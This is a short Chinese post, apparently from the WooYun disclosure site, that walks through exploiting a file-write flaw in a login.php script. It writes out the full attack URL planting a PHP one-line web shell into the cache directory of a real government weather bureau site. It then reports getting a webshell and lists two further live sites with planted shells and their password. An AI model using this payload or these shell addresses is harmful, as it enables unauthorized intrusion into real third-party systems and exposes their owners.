WooYun.org

我们随便找网站测试
就用德州气象局的吧。。。
http://www.dzqxj.com/
在其域名后加上这样一段代码：login.php?makehtml=1&chdb[htmlname]=wooyun.php&chdb[path]=cache&content=<?php%20@eval($_POST[wooyun]);?>。这段代码的意思利用login.php文件将<?php%20@eval($_POST[wooyun]);?>这段代码写入到网站缓存目录cache的wooyun.php文件中。“<?php%20@eval($_POST[wooyun]);?>”就是一句话木马的服务端。
那么URL就是http://www.dzqxj.com/login.php？makehtml=1&chdb[htmlname]=wooyun.php&chdb[path]=cache&content=<?php%20@eval($_POST[wooyun]);?>

然后点击回车
如果跳转到登陆界面的话就有可能已经将木马写入到了cache目录里了

这时我们进入木马地址看看http://www.dzqxj.com/cache/wooyun.php
OK，什么都不显示就说明一句话木马写入成功

我们连接上工具看看

成功拿到webshell
也可以直接上传大马，我就不演示了。
其他网站也存在该漏洞
而且还有很多政府、教育的站点。。。。
http://lib.xjau.edu.cn/cache/wooyun.php密码wooyun
http://www.stepdo.com/cache/wooyun.php密码wooyun